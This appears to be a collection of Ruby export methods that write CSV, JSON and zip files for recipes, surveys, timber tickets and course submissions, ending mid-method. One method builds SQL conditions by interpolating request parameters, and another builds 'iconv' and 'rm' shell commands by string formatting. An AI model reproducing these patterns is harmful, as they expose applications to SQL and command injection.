"def export_csofeed\n # Create header row #\n header = ['Record Type', 'Device Key', 'IP Addresses', 'MAC Addresses', 'System Name', 'FQDN', 'Status', 'Function', 'Runs MOTS/PRISM Apps', 'MOTS/PRISM IDs', 'Runs Non-MOTS/PRISM Apps', 'Internet Facing', 'Device Criticality', 'Device Owner', 'Operating System', 'Operating System Version', 'Administrator\\'s ATTUID', 'Support Group', 'Serial Number', 'Asset Tag Number', 'Location', 'Location CLLI', 'Comments' \"\\n\"]\n csvdoc = [header.join(',')]\n Node.all.each do |node|\n result = make_csoline(node)\n csvdoc << result.join(',') if result\n end\n fname = \"public/csvexports/csofeed_#{Time.now.strftime(\"%d%m%Y\")}.csv.gz\"\n File.open(fname, 'w') do |f|\n gz = Zlib::GzipWriter.new(f)\n gz.write csvdoc\n gz.close\n end\n end",
"def save_to_csv\n csv_options = { col_sep: ',', quote_char: '\"' }\n CSV.open(@file_path, 'wb', csv_options) do |csv_row|\n # To store recipes, we loop over cookbook recipes array (see initializer)\n @recipes.each do |recipe|\n # CSV SHOULD NOT TAKE INSTANCES\n # We must individually separate the name and description from the instances\n # To then store them in array format into each row of the CSV\n # One row per recipe\n csv_row << [recipe.name, recipe.description]\n end\n end\n end",
"def generate_csv\n\n fields = @resource.typus_fields_for(:csv)\n\n require 'csv'\n if CSV.const_defined?(:Reader)\n # Old CSV version so we enable faster CSV.\n begin\n require 'fastercsv'\n rescue Exception => error\n raise error.message\n end\n csv = FasterCSV\n else\n csv = CSV\n end\n\n filename = Rails.root.join(\"tmp\", \"export-#{@resource.to_resource}-#{Time.now.utc.to_s(:number)}.csv\")\n\n options = { :conditions => @conditions, :batch_size => 1000 }\n\n csv.open(filename, 'w', :col_sep => ';') do |csv|\n csv << fields.keys\n @resource.find_in_batches(options) do |records|\n records.each do |record|\n csv << fields.map do |key, value|\n case value\n when :transversal\n a, b = key.split(\".\")\n record.send(a).send(b)\n when :belongs_to\n record.send(key).to_label\n else\n record.send(key)\n end\n end\n end\n end\n end\n\n send_file filename\n\n end",
"def export_scholarship(specialization)\n beg = Date.parse(TermsCalculator.starting_in(2008)) - 1.month\n fin = beg + 1.month\n sql = 'payed_on > ? and payed_on < ? and index_id = ?'\n indices = Index.find_for_scholarship(User.find_by_login('ticha'),\n :conditions => [\"specialization_id = ?\", specialization],\n :paying_date => fin)\n unless indices.empty?\n (1..13).each do |month|\n filename = '%s_%s.csv' % [specialization.code, fin.strftime('%m_%y')]\n File.open(filename, 'wb') do |outfile|\n CSV::Writer.generate(outfile, ';') do |csv|\n csv << [specialization.name, beg.strftime('%Y-%m-%d'),\n fin.strftime('%Y-%m-%d'), '', '']\n csv << ['name', 'type', 'amount', 'disponent', 'payed_on']\n indices.each do |index|\n if scholarships = Scholarship.find(:all, :conditions =>\n [sql, beg, fin, index.id])\n scholarships.each do |scholarship|\n csv << [scholarship.index.student.display_name,\n scholarship.type.to_s[0, 1], scholarship.amount, scholarship.disponent,\n scholarship.payed_on.strftime('%Y-%m-%d')]\n end\n end\n end\n end\n end\n @@mylog.debug 'Exported' + filename\n system 'iconv -f utf-8 -t cp1250 %s > %s' % [filename, filename.gsub(/\\.csv/, '.win.csv')]\n system 'rm %s' % filename\n beg += 1.month\n fin = beg + 1.month\n end\n end\n end",
"def export_survey_answers(csv_survey_answers, survey_id)\n survey = Survey.find(survey_id)\n header = journal_csv_header.keys + ['follow_up'] + survey.variables.map {|v| v.var}\n \n csv_rows = csv_survey_answers.inject([]) do |rows,csa|\n puts \"csa.journal.nil? #{csa.inspect} #{csa.journal.inspect} sa: #{csa.survey_answer.inspect}\" if csa.journal.nil?\n\n journal_entry = JournalEntry.where(\n survey_answer_id: csa.survey_answer_id,\n center_id: csa.center_id, \n group_id: csa.team_id).first\n info = \n if !journal_entry.nil? && journal_entry.answer_info\n journal_entry.answer_info.split(\";\")\n elsif csa.journal_info\n csa.journal_info.split(\";;\")\n elsif csa.survey_answer\n csa.survey_answer.info.values\n else\n puts \"no answer_info found in journal_entry or survey_answer: #{csa.inspect} je: #{csa.journal_entry.inspect}\"\n [\"ingen info: sa_id: #{csa.survey_answer_id} csa: #{csa.inspect} \"]\n end\n\n if !csa || !csa.answer\n puts \"No csa: #{info.inspect}\"\n end\n rows << info + [FollowUp.to_value(csa.follow_up)] + (csa && csa.answer && csa.answer.split(';;') || [] )\n rows\n end\n\n output = CSV.generate(:col_sep => \";\", :row_sep => :auto, :encoding => 'utf-8') do |csv_output|\n csv_output << header\n csv_rows.each { |line| csv_output << line }\n end\n end",
"def zip_app_export_migrations\n temp_file = Tempfile.new([ZipTempFilePrefix, '.zip'])\n # This is the tricky part\n # Initialize the temp file as a zip file\n Zip::OutputStream.open(temp_file) { |zos| }\n\n # Add files to the zip file as usual\n Zip::File.open(temp_file.path, Zip::File::CREATE) do |zip|\n Dir.glob(\"#{app_export_dir}/*.rb\").each do |path|\n filename = path.split('/').last\n zip.add(filename, path)\n end\n end\n temp_file\n end",
"def create_survey_answer_export(survey_id, survey_answers)\n # Spawnling.new(:method => :fork) do\n # spawn_block do\n# Thread.new do\n logger.info \"EXPORT create_survey_answer_export: survey: #{survey_id} #{survey_answers.size}\"\n data = ExportAnswersHelper.new.export_survey_answers(survey_answers, survey_id) # TODO: add csv generation on save_answer & change_answer\n logger.info \"create_survey_answer_export: created data survey: #{survey_id} #{survey_answers.size}\"\n # write data\n self.export_file = ExportFile.create(:data => data,\n # :type => 'text/csv; charset=utf-8; header=present',\n :filename => \"eksport_svar_#{Time.now.to_date.to_s}_#{survey_id}\" + \".csv\",\n :content_type => \"application/vnd.ms-excel\")\n\n self.param1 = survey_id\n self.update_attribute(\"status\", \"Completed\")\n logger.info \"EXPORT set status completed\"\n self.save\n logger.info \"EXPORT saved status\"\n # logger.info \"create_survey_answer_export: finished! survey: #{survey_id} #{survey_answers.size}\"\n# end\n end",
"def write_files(cases, laws)\n File.write(@prefix+\"redlatam_cases.json\", JSON.pretty_generate(cases))\n File.write(@prefix+\"redlatam_laws.json\", JSON.pretty_generate(laws))\n File.write(@prefix+\"redlatam_cases.csv\", gen_csv(@prefix+\"redlatam_cases.json\", @case_h))\n File.write(@prefix+\"redlatam_laws.csv\", gen_csv(@prefix+\"redlatam_laws.json\", @law_h))\n end",
"def initialize_csv\n CSV.open(\"results.csv\", \"wb\") do |csv|\n csv << [\"class\", \"title of course\", \"credits\"]\n end\nend",
"def create_csv()\n hashes = Transaction.all_as_hashes\n CSV.generate do |csv|\n # Adds the keys as headings on the first line\n csv << hashes.first.keys\n # Iterates through the transactions and populates CSV\n hashes.each do |hash|\n csv << hash.values\n end\n end\n end",
"def create_csv\n title = [\"Typed Word\",\"Suggestion\", \"Score\", \"Frequency\", \"ED?\", \"Count ED\", \"Year\"]\n CSV.open('output.csv', 'a') do |csv|\n csv << title\n end\n end",
"def generate_Excel\r\n @db_list.each{|category,value|\r\n# f = open(file,\"w\")\r\n db_name = value[2]\r\n table = \"historical\"\r\n db = SQLite3::Database.new(\"#{@db_dir}/#{db_name}\")\r\n case db_name\r\n when /eurusd/, /audusd/,/nzdusd/\r\n num = 6\r\n else\r\n num = 4\r\n end\r\n# getCSV(f,db,table,num)\r\n file = \"#{@result_dir}/#{value[0]}\"\r\n printf(\"@I:generate %s\\n\",file)\r\n make_excel(file,db,table,num,100)\r\n file = \"#{@result_dir}/ALL_#{value[0]}\"\r\n printf(\"@I:generate %s\\n\",file)\r\n make_excel(file,db,table,num,nil)\r\n \r\n# f.close\r\n }\r\n=begin\r\n # All days CSV\r\n @db_list.each{|category,value|\r\n file = \"#{@result_dir}/ALL_#{value[0]}\"\r\n printf(\"@I:generate %s\\n\",file)\r\n f = open(file,\"w\")\r\n db_name = value[2]\r\n table = \"historical\"\r\n db = SQLite3::Database.new(\"#{@db_dir}/#{db_name}\")\r\n case db_name\r\n when /eurusd/, /audusd/,/nzdusd/\r\n num = 6\r\n else\r\n num = 4\r\n end\r\n getCSV_all(f,db,table,num)\r\n make_excel(file,db,table,num,nil)\r\n f.close\r\n }\r\n=end\r\n end",
"def create_report(links, protocol, host_url)\n CSV.open('link_details.csv', 'w+') do |csv|\n links.each do |link_name, link_path|\n insert_record(csv, link_name, link_path, protocol, host_url)\n end\n end\n end",
"def write_archives\n self.collated.keys.each do |year|\n if self.layouts.key? 'archive_yearly'\n self.write_archive(year.to_s, 'archive_yearly')\n end\n\n self.collated[year].keys.each do |month|\n if self.layouts.key? 'archive_monthly'\n self.write_archive(File.join(year.to_s, month.to_s),\n 'archive_monthly')\n end\n\n self.collated[year][month].keys.each do |day|\n if self.layouts.key? 'archive_daily'\n self.write_archive(File.join(year.to_s, month.to_s, day.to_s),\n 'archive_daily')\n end\n end\n end\n end\n end",
"def collection_to_csv(filepaths, csv_name)\n output_file = CSV.open(csv_name, \"w\")\n header = JSON.parse!(File.read(filepaths[0])).keys\n output_file << header\n\n filepaths.each do |path|\n data = JSON.parse!(File.read(path))\n output_file << data.values\n end\nend",
"def generate_bulk_export\n # Delete the bulk_export directory if it exists.\n FileUtils.rm_rf(\"bulk_export\")\n\n get_all_insurance_plans\n get_all_location_resources\n p \"===============================================================\"\n p \"Creating the Bulk export folder output ...\"\n generate_payer_bulk_data\n generate_formulary_bulk_data\nend",
"def exported_report\n #The folder where the filename points to, is actually in the ~/rails/Forester because of capistrano as\n # the Apache point to ~/rails/Forester/current symlinkfolder and capistrano updates the them. \n @filename = \"quarterly_report_#{params[:year]}_#{params[:quarter]}.csv\"\n @file_path = \"#{Rails.root}/../../shared/system/exports/\"\n if params[:quarter] == \"1\"\n @tickets = Ticket.find(:all, :conditions => \"delivery_date>'#{(params[:year].to_i-1)}-12-31' AND delivery_date<'#{params[:year]}-04-01'\")\n else\n if params[:quarter] == \"2\"\n @tickets = Ticket.find(:all, :conditions => \"delivery_date>'#{params[:year]}-03-31' AND delivery_date<'#{params[:year]}-07-01'\")\n else\n if params[:quarter] == \"3\"\n @tickets = Ticket.find(:all, :conditions => \"delivery_date>'#{params[:year]}-06-30' AND delivery_date<'#{params[:year]}-10-01'\")\n else\n if params[:quarter] == \"4\" then\n @tickets = Ticket.find(:all, :conditions => \"delivery_date>'#{params[:year]}-09-30' AND delivery_date<'#{(params[:year].to_i+1)}-01-01'\")\n end\n end\n end\n end\n \n #Writing to file starts with empty line.\n File.open(\"#{@file_path}#{@filename}\", 'w') do |writer|\n writer.puts(\"\\n\")\n end\n \n #From the tickets delivered in the given quarter, the job ids are gathered here\n @job_ids = @tickets.collect {|i| i.job_id }\n @jobs = Job.find(@job_ids)\n \n #To have less DB calls, all specie records are put into an instance variable\n @species = Specie.all\n \n #Goes through all the jobs, for each sums up all the mbf and tonnages and writes them into the file\n # per specie.\n @jobs.each do |k|\n @my_tickets = []\n @tickets.each do |l|\n if l.job_id == k.id\n @my_tickets.push(l)\n end\n end\n \n @amounts = []\n \n @species.length.times do\n @amounts.push([0, 0])\n end\n \n @total_pulp = 0\n \n @my_tickets.each do |i|\n i.load_details.each do |j|\n if i.wood_type == 3 || j.species_id == 0 #wood type 3 & species_id 0 == pulp\n @total_pulp = @total_pulp + j.tonnage\n next #If load is pulp, it has only one load detail so program jups to next loop\n end\n #Amounts of mbf/tonnage are summed up here per ticket according to their specie.\n @amounts[j.species_id-1][0] = @amounts[j.species_id-1][0] + j.mbfss #This and triple-n tonnage in next are helper methods. See their documentation.\n @amounts[j.species_id-1][1] = @amounts[j.species_id-1][1] + j.tonnnage\n end\n end\n \n #Finally, the values calculated above are written into the file.\n File.open(\"#{@file_path}#{@filename}\", 'a') do |writer|\n writer.puts \"Job, #{k.name}\"\n writer.puts \"Category, MBF, Tonnage\"\n @species.each do |i|\n writer.puts \"#{i.code}, #{round_to(@amounts[i.id-1][0].to_f, 2)}, #{round_to(@amounts[i.id-1][1].to_f, 2)}\"\n end\n writer.puts \"Pulp, ,#{round_to(@total_pulp.to_f, 2)}\"\n writer.puts(\"\\n\")\n end\n end\n \n #The file created is opened in 'r' (== read) mode and send to user\n @file = File.open(\"#{@file_path}#{@filename}\", 'r')\n \n send_data(@file.read, :type => \"csv\", :filename => @filename)\n end",
"def save_csv\n CSV.open(@csv_file_path, \"wb\") do |csv|\n csv << [\"name\", \"description\", \"rating\", \"prep_time\", \"done\"]\n @recipes.each do |recipe|\n csv << [recipe.name, recipe.description, recipe.rating, recipe.prep_time, recipe.done?]\n end\n end\n end",
"def process_csv_project(filename, output_path)\n analysis = OpenStudio::Analysis.from_csv(filename)\n analysis.save \"#{output_path}.json\"\n analysis.save_zip \"#{output_path}.zip\"\n\n OpenStudio::Analysis.aws_instance_options(filename)\nend",
"def create_csv_for_GH(csv_data)\n\n csv_string = CSV.open(\"#{$basefile}GH.csv\", \"wb\") do |csv|\n\n csv_data.each do |hash|\n csv << hash\n\n end\n end\n end",
"def generate_zip_file!(sheet_scope)\n temp_dir = Dir.mktmpdir\n\n\n filename = \"#{name.gsub(/[^a-zA-Z0-9_-]/, \"_\")}_#{created_at.strftime(\"%H%M\")}\"\n all_files = generate_all_files(sheet_scope, temp_dir, filename)\n\n return if all_files.empty?\n\n # Create a zip file\n zipfile_name = File.join(temp_dir, \"#{filename}.zip\")\n Zip::File.open(zipfile_name, Zip::File::CREATE) do |zipfile|\n all_files.uniq.each do |location, input_file|\n # Two arguments:\n # - The name of the file as it will appear in the archive\n # - The original file, including the path to find it\n zipfile.add(location, input_file) if File.exist?(input_file) && File.size(input_file) > 0\n end\n end\n zipfile_name\n\n if File.exist?(zipfile_name)\n export_succeeded(zipfile_name)\n else\n export_failed(failure_details)\n end\n ensure\n # Remove the directory.\n FileUtils.remove_entry temp_dir\n end",
"def write_csv\n # header = \"name, description\"\n CSV.open(@csv_file, 'wb') do |csv|\n # csv << header\n @recipes.each do |row|\n csv << [row.name, row.description, row.cooking_time, row.difficulty, row.tested]\n end\n end\n end",
"def generate_csv_file(file_path, row_data)\n CSV.open(file_path, \"wb\") do |csv|\n csv << [\"first_name\", \"last_name\", \"dob\", \"member_id\", \"effective_date\", \"expiry_date\", \"phone_number\"]\n row_data.each { |row| csv << row }\n end\nend",
"def write_export_data_to_files(config, patients, inner_batch_size)\n case config[:format]\n when 'csv'\n csv_export(config, patients, inner_batch_size)\n when 'xlsx'\n xlsx_export(config, patients, inner_batch_size)\n end\n end",
"def createMergeCsvFiles()\n fileNames = Array.new\n \n # key:API name, value: array of data array(size = number of csv files)\n bufHash = Hash.new\n @csvFiles.each {|file|\n # csv data: array of array\n csvDatas = readCSV(file)\n # To get the keyword(apiNames) from the first column.\n apiNames = csvDatas[0]\n # convert the data of each row to column\n # Limitaion: The size of the array elements of csvDatas must be the same.\n newCsvDatas = csvDatas.transpose()\n \n if (bufHash.size == 0)\n # set data for keyword\n apiNames.each_with_index {|keyword, idx|\n bufHash[keyword] = [ newCsvDatas[idx] ]\n }\n else\n # set data for keyword\n bufHash.each {|keyword,val|\n # key exist?\n idx = apiNames.find_index(keyword)\n if (idx != nil)\n bufHash[keyword].push( newCsvDatas[idx] )\n end\n }\n end\n \n }\n \n # create csv for key\n bufHash.each {|keyword, values|\n strBufArray = Array.new\n # values: array of array\n values.each_with_index {|csvData, csvIndex|\n csvData.each_with_index {|elem, index|\n if (csvIndex == 0)\n if (index == 0)\n strBufArray[index] = sprintf(\"number,%d_%s\", csvIndex+1, elem)\n else\n strBufArray[index] = sprintf(\"%d,%s\", index, elem)\n end\n else\n if (index == 0)\n strBufArray[index] += sprintf(\",%d_%s\", csvIndex+1, elem)\n else\n strBufArray[index] += sprintf(\",%s\", elem)\n end\n end\n }\n }\n \n strBuf = strBufArray.join(\"\\n\")\n \n # generate filename by date\n filename = Time.now.strftime(\"%Y%m%d%H%M%S\")\n filename = sprintf(\"%s_%s.csv\", filename, keyword)\n filename = filename.gsub(/:+/,'_')\n File.open(filename, 'w') { |file|\n file.puts(strBuf)\n }\n fileNames.push(filename)\n }\n \n @csvFiles = fileNames\n end",
"def export_csv\n # Find all Setup with the stored restrictions\n sorting :default => 'es_setups.path, es_setups.name'\n setups = EsSetup.find :all, :order => @sort, :conditions => session[:conditions_setup]\n # Creation of the file\n file_name = \"setups_export_\" + current_user.id.to_s + \".csv\"\n \n csv_string = CSV.generate({:col_sep => ';', :encoding => \"ISO-8859-15\" }) do |csv|\n csv << [\"Chemin\".trn,\"Nom\".trn,\"Valeur\".trn,\"Type\".trn, \"Lecture seule\".trn]\n setups.each do |t|\n csv << [t.path,t.name,t.value,t.type_data,(t.read_only=='Y' ? 'V' : '')]\n end\n end\n send_data Iconv.conv('iso-8859-1//IGNORE', 'utf-8', csv_string), :filename => file_name, :disposition => 'attachment', :type => 'text/csv; charset=iso-8859-1; header=present'\n end",
"def create_csv_file(keys, strings, comments = nil)\n raise \"csv_filename must not be nil\" unless @csv_filename\n CSV.open(@csv_filename, \"wb\") do |csv|\n @headers << \"Comments\" if !comments.nil? && !comments.empty?\n csv << @headers\n keys.each do |key|\n line = [key]\n default_val = strings[@default_lang][key] if strings[@default_lang]\n @filenames.each do |fname|\n lang = fname\n current_val = (lang != default_lang && strings[lang][key] == default_val) ? '' : strings[lang][key]\n line << current_val\n end\n line << comments[key] if comments && comments[key]\n csv << line\n end\n puts \"Done\"\n end\n end",
"def create_assignment_csv(args)\n [:path, :urls].each{|arg| args[arg] or raise Error::Argument, \"Missing arg '#{arg}'\" }\n headers = ['audio_url',\n 'project_id',\n 'unusual',\n 'chunk',\n 'chunk_hours',\n 'chunk_minutes',\n 'chunk_seconds',\n 'voices_count',\n (1 .. args[:voices].count).map{|n| [\"voice#{n}\", \"voice#{n}title\"]}\n ].flatten\n csv = args[:urls].map do |url|\n [url, \n local.id,\n args[:unusual].join(', '),\n interval_as_time_string,\n interval_as_hours_minutes_seconds.map{|n| (n == 0) ? nil : n },\n args[:voices].count,\n args[:voices].map{|v| [v[:name], v[:description]]}\n ].flatten\n end\n local.file(*args[:path]).as(:csv).write_arrays(csv, headers)\n local.file_path(*args[:path])\n end",
"def save\n csv = [] # store CSV lines to write to file\n # Iterate over BasicFoods and retrieve CSV format for each \n @basic_foods.each do |key, basic_food|\n csv.push(basic_food.csv)\n end\n # Iterate over Recipes and retrieve CSV format for each\n @recipes.each do |key, recipe|\n csv.push(recipe.csv)\n end\n File.write('FoodDB.txt', csv.join(\"\\n\")) # Write CSV lines to file\n end",
"def generate_simple_submission_solution_files(zip)\n # Create solution directory and create solution files\n zip.put_next_entry 'solution/'\n zip.put_next_entry 'solution/template'\n zip.print @test_params[:solution]\n\n # # Create submission directory with template file\n zip.put_next_entry 'submission/'\n zip.put_next_entry 'submission/template'\n zip.print @test_params[:submission]\n zip.print \"\\n\"\n end",
"def generateCSV()\n findCommits\n findLinesOfCode\n\n CSV.open(\"data.csv\", \"wb\") {|csv| @students.to_a.each {|elem| csv << elem} }\nend",
"def generate_batch_task_zip(user, tasks, unit)\n download_id = \"#{Time.new.strftime(\"%Y-%m-%d\")}-#{unit.code}-#{current_user.username}\"\n filename = FileHelper.sanitized_filename(\"batch_ready_to_mark_#{current_user.username}.zip\")\n output_zip = Tempfile.new(filename)\n # Create a new zip\n Zip::File.open(output_zip.path, Zip::File::CREATE) do | zip |\n csv_str = mark_csv_headers\n # Add individual tasks...\n tasks.select { |t| t.group_submission.nil? }.each do | task |\n # Skip tasks that do not yet have a PDF generated\n next if task.processing_pdf\n # Add to the template entry string\n student = task.project.student\n if task.status == :need_help\n mark_col = 'need_help'\n else\n mark_col = 'rtm'\n end\n csv_str << \"\\n#{student.username.gsub(/,/, '_')},#{student.name.gsub(/,/, '_')},#{task.project.tutorial.abbreviation},#{task.task_definition.abbreviation.gsub(/,/, '_')},#{task.id},\\\"#{task.last_comment_by(task.project.student).gsub(/\"/, \"\\\"\\\"\")}\\\",\\\"#{task.last_comment_by(user).gsub(/\"/, \"\\\"\\\"\")}\\\",#{mark_col},,\"\n\n src_path = task.portfolio_evidence\n\n next if src_path.nil? || src_path.empty?\n next unless File.exists? src_path\n\n # make dst path of \"<student id>/<task abbrev>.pdf\"\n dst_path = FileHelper.sanitized_path(\"#{task.project.student.username}\", \"#{task.task_definition.abbreviation}-#{task.id}\") + \".pdf\"\n # now copy it over\n zip.add(dst_path, src_path)\n end\n # Add group tasks...\n tasks.select { |t| t.group_submission }.group_by { |t| t.group_submission } .each do | subm, tasks |\n task = tasks.first\n # Skip tasks that do not yet have a PDF generated\n next if task.processing_pdf\n\n # Add to the template entry string\n grp = task.group\n next if grp.nil?\n csv_str << \"\\nGRP_#{grp.id}_#{subm.id},#{grp.name.gsub(/,/, '_')},#{grp.tutorial.abbreviation},#{task.task_definition.abbreviation.gsub(/,/, '_')},#{task.id},\\\"#{task.last_comment_not_by(user).gsub(/\"/, \"\\\"\\\"\")}\\\",\\\"#{task.last_comment_by(user).gsub(/\"/, \"\\\"\\\"\")}\\\",rtm,,\"\n\n src_path = task.portfolio_evidence\n\n next if src_path.nil? || src_path.empty?\n next unless File.exists? src_path\n\n # make dst path of \"<student id>/<task abbrev>.pdf\"\n dst_path = FileHelper.sanitized_path(\"#{grp.name}\", \"#{task.task_definition.abbreviation}-#{task.id}\") + \".pdf\"\n # now copy it over\n zip.add(dst_path, src_path)\n end\n\n # Add marking file\n zip.get_output_stream(\"marks.csv\") { | f | f.puts csv_str }\n\n # Add readme file\n zip.get_output_stream(\"readme.txt\") { | f | f.puts readme_text }\n end\n output_zip\n end",
"def create_csv_for_LLR(csv_data)\n\n csv_string = CSV.open(\"#{$basefile}LLR.csv\", \"wb\") do |csv|\n\n csv << csv_data.first.keys\n csv_data.each do |hash|\n csv << hash.values\n end\n end\n end",
"def make_history_csv\n FileUtils.mkdir_p(@@csv_location.dirname) unless Dir.exist?(csv_location.dirname)\n create_stub_csv_file unless File.exist?(@@csv_location)\n end",
"def build_csv()\n\t\tconcat_path = \"#{@location}/#{@name}.csv\"\n\n\t\tCSV.open(concat_path, 'wb') do |csv_line|\n\t\t\t\t\t\n\t\t\theaders = ['movie_date', 'title', 'lifetime_gross_sales']\n\t\t\tcsv_line << headers\n\n\t\t\t@cage.each do |cage|\n\t\t\t\tcsv_line << [cage[:movie_date], cage[:title], cage[:life_time_gross]]\n\t\t\tend\n\t\tend\n\tend",
"def export_csv\n # Find all Setup with the stored restrictions\n sorting :default => @@default_sort\n collection = @@model.find :all, :order => @sort, :conditions => session[:conditions]\n # Creation of the file\n file_name = \"#{@@param_name}_export_\" + current_user.id.to_s + \".csv\"\n \n csv_string = CSV.generate({:col_sep => ';', :encoding => \"ISO-8859-15\" }) do |csv|\n csv << @@name_print.map{|n| n.trn}\n collection.each do |element|\n csv << @@field_print.map{|f| element[f]}\n end\n end\n send_data Iconv.conv('iso-8859-1//IGNORE', 'utf-8', csv_string), :filename => file_name, :disposition => 'attachment', :type => 'text/csv; charset=iso-8859-1; header=present'\n end",
"def process_and_upload_csv\n\n @has_data = get_data_from_db do |data|\n formatted_data = format_data(data)\n c_add formatted_data\n end\n\n if @has_data\n zip_folder\n upload_to_s3\n delete_local_files\n end\n\n end",
"def save_wizards\n #open the file for writing\n file = File.open(\"wizards.csv\", \"w\")\n # iterate over the array of save_wizards\n @wizards.each do |wizard|\n wizard_data = [wizard[:name], wizard[:house]]\n csv_line = wizard_data.join(\",\")\n file.puts csv_line\n end\n file.close\nend",
"def zip_qrda_files\n file_name = name.gsub(/[^0-9A-Za-z]/, '_')\n FileUtils.mkdir_p(\"public/data/#{user_id}\")\n update_attribute(:file_path, \"data/#{user_id}/#{file_name}.zip\")\n Zip::ZipOutputStream.open('public/' + file_path) do |zip|\n i = 0\n document_ids.shuffle.each do |document_id|\n doc = Document.find(document_id)\n doc.update_attribute(:test_index, i)\n doc.update_attribute(:name, i.to_s.rjust(4, '0') + ' - ' + doc.name)\n zip.put_next_entry(\"#{doc.name}.xml\")\n zip << doc.qrda\n i += 1\n end\n end\n end",
"def create_finals_file\n file = File.open('final.csv', 'w')\n $students.each do |student|\n name = student[:name]\n avg = get_avggrades(student)\n file.puts \"#{name} #{avg}\"\n end\n file.close\nend",
"def generate_standard_submission_solution_files(zip, submission_files_to_keep, solution_files_to_keep)\n zip.mkdir('submission')\n @test_params[:submission_files].try(:each) do |file|\n next if file.nil?\n\n zip.add(\"submission/#{file.original_filename}\", file.tempfile.path)\n end\n\n submission_files_to_keep.each do |file|\n zip.add(\"submission/#{File.basename(file.path)}\", file.path)\n end\n\n zip.mkdir('solution')\n @test_params[:solution_files].try(:each) do |file|\n next if file.nil?\n\n zip.add(\"solution/#{file.original_filename}\", file.tempfile.path)\n end\n\n solution_files_to_keep.each do |file|\n zip.add(\"solution/#{File.basename(file.path)}\", file.path)\n end\n end",
"def export_the_thing\n #First, the file name, path and table headers will be set according to given id \n if params[:id] == \"1\"\n @jobs = Job.all\n \n #Same filepath thingy here as above\n @filename = \"Jobs_on_#{Time.now.strftime(\"%Y-%m-%d_%H:%M:%S\")}.csv\"\n @file_path = \"#{Rails.root}/../../shared/system/exports/\"\n @table_name = \"Jobs\"\n @table_headers = \"Name, Owner Name, Logger Name, Trucker Name, HFI-rate (%), HFI-prime\" \n end\n \n if params[:id] == \"2\"\n @tickets = Ticket.all\n \n @filename = \"Tickets_on_#{Time.now.strftime(\"%Y-%m-%d_%H:%M:%S\")}.csv\"\n @file_path = \"#{Rails.root}/../../shared/system/exports/\"\n @table_name = \"Tickets\"\n \n @species = \"\"\n Specie.all.each do |i|\n @species = \"#{@species}, #{i.code}\"\n end\n \n @table_headers = \"Number, Delivery Date, Destination Name, Job Name, Wood Type#{@species}, Tonnage, Net MBF, Load Pay, Logger Pay, Trucker Pay, HFI Pay, Owner Pay\" \n end\n if params[:id] == \"3\"\n @payments = PaymentFromDestination.all\n \n @filename = \"Payments_on_#{Time.now.strftime(\"%Y-%m-%d_%H:%M:%S\")}.csv\"\n @file_path = \"#{Rails.root}/../../shared/system/exports/\"\n @table_name = \"Payments\"\n @table_headers = \"Date, Destination Name, Job Name, Payment #, Wood Type, Net MBF, Tonnage, Total Payment\" \n end\n if params[:id] == \"4\"\n @receipts = Receipt.all\n \n @filename = \"Receipts_on_#{Time.now.strftime(\"%Y-%m-%d_%H:%M:%S\")}.csv\"\n @file_path = \"#{Rails.root}/../../shared/system/exports/\"\n @table_name = \"Receipts\"\n @table_headers = \"Date, Job Name, Owner Type, Owner Name, Payment #, # of Tickets, Total Payment\" \n end\n\n \n #Then, file is created with name and path set above and the headers are written to the file\n #After writing the headers, the data according to given id is written.\n File.open(\"#{@file_path}#{@filename}\", \"w\") do |writer|\n writer.puts @table_name\n writer.puts @table_headers\n \n if params[:id] == \"1\"\n @jobs.each do |i|\n @puts = \"#{i.name}, #{i.owner.name.gsub(',', '')}, #{i.logger.name.gsub(',', '')}, #{i.trucker.name.gsub(',', '')}, #{i.hfi_rate}, #{i.hfi_prime}\"\n writer.puts @puts\n end\n end\n \n if params[:id] == \"2\"\n @tickets.each do |i|\n @amounts = []\n \n Specie.all.each do\n @amounts.push(0)\n end\n \n i.load_details.each do |j|\n unless j.mbfs.nil?\n @amounts[j.species_id-1] = j.mbfs\n else\n @amounts[j.species_id-1] = 0\n end\n end\n \n @amounts_str = \"\"\n @amounts.each do |j|\n @amounts_str = \"#{@amounts_str}, #{j}\"\n end\n \n if i.logger_rate.nil? 
\n i.logger_value = 0\n else\n \n if i.logger_rate.rate_type == \"MBF\"\n i.logger_value = i.net_mbf * i.logger_rate.rate\n i.logger_value = i.logger_value.round(2)\n end\n if i.logger_rate.rate_type == \"Tonnage\"\n i.logger_value = i.tonnage * i.logger_rate.rate\n i.logger_value = i.logger_value.round(2)\n end\n if i.logger_rate.rate_type == \"percent\"\n i.logger_value = i.value * (i.logger_rate.rate/100)\n i.logger_value = i.logger_value.round(2)\n end\n end\n \n if i.trucker_rate.nil?\n i.trucker_value = 0\n else\n if i.trucker_rate.rate_type == \"MBF\"\n i.trucker_value = round_to(i.trucker_rate.rate*i.net_mbf, 2)\n else\n if i.trucker_rate.rate_type == \"Tonnage\"\n i.trucker_value = round_to(i.trucker_rate.rate*i.tonnage, 2)\n else\n i.trucker_value = round_to(i.trucker_rate.rate/100*i.value, 2)\n end\n end\n end\n \n if i.job.hfi_rate.nil?\n i.hfi_value = 0\n else\n i.hfi_value = (i.job.hfi_rate/100)*i.value\n end\n \n i.owner_value = i.value - i.hfi_value - i.logger_value - i.trucker_value\n \n @puts = \"#{i.number}, #{i.delivery_date}, #{i.destination.name.gsub(',', '')}, #{i.job.name.gsub(',', '')}, \"\n @puts << \"#{WoodType.find(i.wood_type).name}#{@amounts_str}, #{i.tonnage}, #{i.net_mbf}, #{give_pennies(i.value).gsub(',', '')}, #{give_pennies(i.logger_value).gsub(',', '')}, #{give_pennies(i.trucker_value).gsub(',', '')}, #{give_pennies(i.hfi_value).gsub(',', '')}, #{give_pennies(i.owner_value).gsub(',', '')}\"\n writer.puts @puts\n end\n end\n \n if params[:id] == \"3\"\n @payments.each do |i|\n @puts = \"#{i.payment_date}, #{i.destination.name.gsub(',', '')}, #{i.job.name.gsub(',', '')}, #{i.payment_num}, \"\n @puts << \"#{WoodType.find(i.wood_type).name}, #{i.tonnage}, #{i.net_mbf}, \"\n @puts << \"#{give_pennies(i.total_payment).gsub(',', '')}\"\n writer.puts @puts\n end\n end\n \n if params[:id] == \"4\"\n @receipts.each do |i|\n if i.owner_type == \"owner\"\n @puts = \"#{i.receipt_date}, #{i.job.name.gsub(',', '')}, #{i.owner_type}, #{Owner.find(i.owner_id).name.gsub(',', '')}, #{i.payment_num}, \"\n @puts << \"#{i.tickets.count}, #{i.total_payment.to_s}\"\n else\n if i.owner_type == \"hfi\"\n @puts = \"#{i.receipt_date}, #{i.job.name.gsub(',', '')}, #{i.owner_type}, Halme 